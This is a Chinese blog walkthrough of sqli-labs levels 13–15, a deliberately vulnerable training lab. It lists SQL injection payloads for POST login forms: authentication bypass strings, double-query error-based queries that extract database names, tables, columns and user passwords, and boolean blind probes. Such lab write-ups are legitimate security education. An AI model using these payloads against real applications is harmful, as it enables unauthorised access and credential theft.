sqli-labs第十三关--十五关

最新推荐文章于 2024-04-27 08:59:52 发布
最新推荐文章于 2024-04-27 08:59:52 发布
阅读量3.2k 收藏 2
点赞数 3
分类专栏: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bt517840374/article/details/80724889
版权

第十三关 Double Injection- String- with twist(双注入 - 字符型 - 变形)

看一看它的源代码
这里写图片描述

POST传值没有任何过滤,@不显示输出,echo $sql;这个语句是我加的,为了显示再输入框中的语句是如何显示的

直接闭合,用户名和密码输入“ ‘) or (‘1’) = (‘1%23 ” 双引号里面的语句,前面的单引号加括号和sql中的括号单引号闭合,后边的也闭合了,看图片:

这里写图片描述

一切都是对的,为什么还是登录失败?

因为username那儿变成空的了,所以前面随便加上一个用户名就行了。

这里写图片描述

看红箭头,加上用户名和密码的名称就登录成功了

这里写图片描述

这样的也可以,我用%23没用,#号就行了,囧

    uname= ') or ('1')=('1 &passwd= ') or ('1')=('1 &submit=Submit

    uname= ') or 1=1 # &passwd= ') or 1=1 # &submit=Submit

     其它:

    uname= ') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

    uname= ') union select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit


    uname= ') union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

    uname= ') union select 1,2 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

    uname= ') union select 1,2 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

    uname= ') union select 1,2 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

    uname= ') union select 1,2 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

利用代码实现

第十四关 Double Injection- Double quotes- String

(第14课:双注入 - 双引号 - 字符串)

看一下源代码:

这里写图片描述

什么括号也没有

这里写图片描述

我就输入了画横线的,“ ” or “1” = “1”# ”,双引号里面的字符,然后就登录成功了,上面的 uname u n a m e 和 passwd不加过滤真的很…

代码:

uname= " or "1"="1&passwd=" or "1"="1 &submit=Submit

     uname=" or 1=1 --+&passwd=" or 1=1 --+&submit=Submit

     uname=" or 1=1 #&passwd=" or 1=1 #&submit=Submit

     其它:

     uname= " union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit


    uname= " union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

    uname= " union select 1,2 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

    uname= " union select 1,2 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

    uname= " union select 1,2 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

    uname= " union select 1,2 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

第十五关 Blind- Boolian Based- String

(第15课:盲注 - 基于布尔值 - 字符串)

看看源代码:

这里写图片描述

感觉echo $sql;是在作弊呀

这里写图片描述

代码:

 uname=' or '1'='1 &passwd=' or '1'='1 &submit=Submit

     uname=' or 1=1 #&passwd=' or 1=1 #&submit=Submit


     其它:

     uname=' or (length(database())) = 8 #&passwd=' or 1=1 #&submit=Submit

     uname=' or (ascii(substr((select database()) ,1,1))) = 115 #&passwd=' or 1=1 #&submit=Submit

一脸懵懵的,感觉#号好强大

小人物哎
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
sqli-labs(十三)
qq_65950075的博客
05-03 574
报错原理:xml文档中查找字符位置是用/xxx/xxx/xxx/...这种格式,如果写入其他格式就会报错,并且会返回写入的非法格式内容,错误信息如:XPATH syntax error:'xxxxxxxx‘没有任何的返回信息,只有报错信息,那我们就用报错注入,让返回的报错信息包含我们的想要的信息。0x7e是~的意思,用concat拼接我们的sql语句,不符合xml文档的格式,就会报错,参数2:XPath_string(Xpath格式的字符串),注入时可操作的地方。作用:改变文档中符合条件的节点的值。
sqli-labs靶场(1-22
weixin_51566481的博客
08-16 7398
sqli-labs,sql注入,burpsuit
Sqli-lab教程-史上最全详解(1-22通
最新发布
Innocence_0的博客
04-27 1025
Less-1 联合注入Less-2Less-3Less-4Less-5 报错注入/布尔盲注/时间盲注Less-6 报错注入/布尔盲注/时间盲注Less-7 文件导出Less-8 布尔盲注/时间盲注Less-9 时间盲注Less-10 时间盲注Less-11 post注入Less-12 post注入Less-13 post盲注Less-14 post盲注Less-15 时间盲注Less-16 时间盲注Less-17 修改密码Less-18 user-agent头注入。
sqli-labs靶场第十三
gou1791241251的博客
12-27 770
paloy:admin’) or (select table_name from information_schema.tables where table_schema=database() limit 0,1)=‘emails’ # 闭合方式为’) 可以使用布尔盲注和报错注入
sqli-labs/Less-13
m0_71299382的博客
11-18 269
sqli-labs第十三
sqli-lab教程 less-13,14
xiaoyuhensuai的博客
07-09 304
这一题我们需要使用burp suite。首先我们在username和password中随便输入一串数字或字母,然后进入抓包开始操作。首先我们来对数据库名进行查询: 如下图所示:可以看出数据库名为“security” 接着我们来继续查询数据库有哪些: 如下图所示: 其次来查看security数据库中所有的数据表: 如下图所示:接着我们来显示users中的字段: 如图下图所示: 查找原SQL语句:$sql="SELECT username, password FROM users WHERE
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs第十五
yuqnqi的博客
05-09 839
我们采用延迟盲注(时间注入主要用 if(表达式1,表达式2,表达式3) 函数与sleep() 函数配合使用。if函数原理是当表达式1为True时,返回值为表达式二,否则返回表达式三。在尝试之后,联合查询和报错注入方式后无果,我们初步判断为盲注。正确的时候可以直接登录,不正确的时候这里会延时 5 秒。页面无回显,单靠页面无法判断闭合方式,所以得查看源码。本属于时间注入,基于源码分析,闭合字符是单引号。最后就是猜数据库表和猜数据库了,这里就不在叙述了。看这延迟5秒中,说明猜想数据库8位正确。
Sqli-labs-master超详细通教程(1-23|基础篇)
热门推荐
weixin_51143375的博客
11-02 2万+
一到四主要是参数被包装的问题。一般用于尝试的语句 Ps:--+可以用#替换,url 提交过程中 Url 编码后的#为%23 and1=2--+ 'and1=2--+ "and1=2--+ )and1=2--+ ')and1=2--+ ")and1=2--+ "))and1=2--+ 图中显示的sql语句是我为了方便理解,修改了源代码显示出的 第一: 页面正常,考虑是否有字符注入,先加单引号 可以看到提示,存在' '包装,我们加上--+ http://127.0.0.
sqllab第十五笔记
I_WORM的博客
03-14 422
尝试进行admin admin登录发现没有任何的回显信息。
sqli-labs ————less -13
Fly_鹏程万里
05-11 980
Less -13源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&g..
sqli-labs-------13lesson-post(单引号变形双注入)
枯藤闲画云
07-05 276
我们根据尝试发现有报错。以及数据应该是以单引号和括号闭合的。 尝试万能密码发现无效 然后通过bp抓包改包下面的都可以 uname=admin') and extractvalue(1,concat(0x7e,(select database()))) and (' uname=admin') and extractvalue(1,concat(0x7e,(select dat...
[网络安全]sqli-labs Less-15 解题详析
等风来
07-24 2444
以上为[网络安全]sqli-labs Less-15 解题详析,后续将分享[网络安全]sqli-labs Less-16 解题详析我是秋说,我们下次见。
sqli-labs第十五和十六(post请求-布尔盲注)
qq_42266432的博客
08-26 840
开启第十五,先尝试注入,注入多次后发现页面无报错也无回显,于是尝试盲注 使用万能密码’ or 1=1登陆成功,’ or 1=2登录失败,这里可以使用布尔盲注, 研究响应页面发现登录成功和登录失败时底下的提示是一个图片,而图片的命名不同,可以此区分成功和失败,开始写脚本,脚本的思路和之前使用布尔盲注的卡类似,只需修改请求类型、数据和if条件即可,代码如下: import requests # 获取数据库名长度 def database_len(): for i in range(1,10):
sqli-labs/Less-15
m0_71299382的博客
11-18 496
sqli-labs第十五
http://127.0.0.1/sqli-labs/无法访问
07-28
回答: 根据提供的引用内容,我们可以得出以下结论。引用\[1\]中提到了一个SQL注入的示例,其中使用了一些条件来判断是否存在漏洞。引用\[2\]中提到了在打开特定URL时出现的错误信息,这可能是由于数据库设置或数据表中的问题导致的。引用\[3\]中提到了使用Burp进行爆破的方法,以获取数据库中的表名。根据这些信息,我们可以推断出问题中提到的URL无法访问可能是由于数据库设置或数据表中的问题导致的。然而,由于缺乏更多的信息,无法给出更具体的答案。建议检查数据库设置和数据表是否正确,并确保URL的正确性。 #### 引用[.reference_title] - *1* *3* [最详细的讲解 让你最快通Less-9-Less-10/ --时间盲注http://127.0.0.1/sqli-labs-master/Less-10/ --时间...](https://blog.csdn.net/m0_58883317/article/details/124224120)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [sql labs的搭建,浏览器127.0.0.1报错](https://blog.csdn.net/weixin_44766712/article/details/115100261)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值